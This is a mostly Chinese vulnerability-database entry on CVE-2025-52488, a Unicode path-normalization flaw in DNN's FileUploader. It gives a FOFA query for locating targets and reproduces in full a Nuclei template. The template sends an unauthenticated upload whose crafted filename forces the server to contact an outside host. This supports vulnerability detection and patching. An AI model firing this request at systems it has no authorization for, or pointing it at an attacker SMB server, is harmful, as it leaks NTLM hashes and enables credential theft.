DNN FileUploader Unicode Path Normalization Vulnerability

漏洞信息

漏洞名称： DNN FileUploader Unicode Path Normalization Vulnerability

漏洞编号：

• CVE： CVE-2025-52488

漏洞类型： 信息泄露

漏洞等级： 高危

漏洞描述： DNN（原名DotNetNuke）是一个开源的基于微软生态系统的网络内容管理平台（CMS）。在6.0.0至10.0.1之前的版本中，DNN.PLATFORM允许通过精心构造的一系列恶意交互，可能将NTLM哈希暴露给第三方SMB服务器。此问题已在10.0.1版本中修复。

受影响产品：DNN（DotNetNuke）是一个广泛使用的开源内容管理系统，主要用于构建和管理网站。它支持模块化扩展，适用于各种规模的网站部署，从小型企业到大型企业级应用。

漏洞解释：该漏洞属于信息泄露类型，具体是由于Unicode路径规范化处理不当导致的。攻击者可以通过构造特殊的Unicode字符序列，利用DNN FileUploader组件的文件上传功能，触发与第三方SMB服务器的交互，从而泄露NTLM哈希。这种漏洞的根源在于对用户输入的处理不够严格，未能正确验证和过滤特殊字符。

影响分析：此漏洞允许攻击者在无需用户交互的情况下远程泄露NTLM哈希，可能导致进一步的攻击，如中间人攻击或凭证重放攻击。由于NTLM哈希可以被用来进行身份验证，泄露这些哈希可能会危及系统安全。漏洞的利用不需要认证，且可以自动化执行，因此对受影响系统的安全构成了严重威胁。

产品厂商： dotnetnuke

产品名称： DNN (DotNetNuke)

影响版本： 6.0.0 <= version < 10.0.1

搜索语法： app=”DotNetNuke”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/6292fc407b4ab046d870814c2b4ef687cfba7dce/http%2Fcves%2F2025%2FCVE-2025-52488.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-52488

info:
  name: Unicode Path Normalization in DNN FileUploader - DNS Interaction
  author: DhiyaneshDk,iamnoooob,pdresearch
  severity: high
  description: |
    DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
  reference:
    - https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96
    - https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-52488
    cwe-id: CWE-200
    epss-score: 0.00031
    epss-percentile: 0.07222
  metadata:
    verified: true
    max-request: 1
    vendor: dotnetnuke
    product: dotnetnuke
    fofa-query: app="DotNetNuke"
  tags: cve,cve2025,file-upload,dotnetnuke,oast,obb

variables:
  payload: "%EF%BC%BC%EF%BC%BC{{interactsh-url}}%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Accept-Language: en-US;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXX

        ------WebKitFormBoundaryXXXXXXXXXXXX
        Content-Disposition: form-data; name="file"; filename="{{url_decode(replace(payload,'.','%EF%BC%8E'))}}"
        Content-Type: image/jpeg

        test
        ------WebKitFormBoundaryXXXXXXXXXXXX--

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"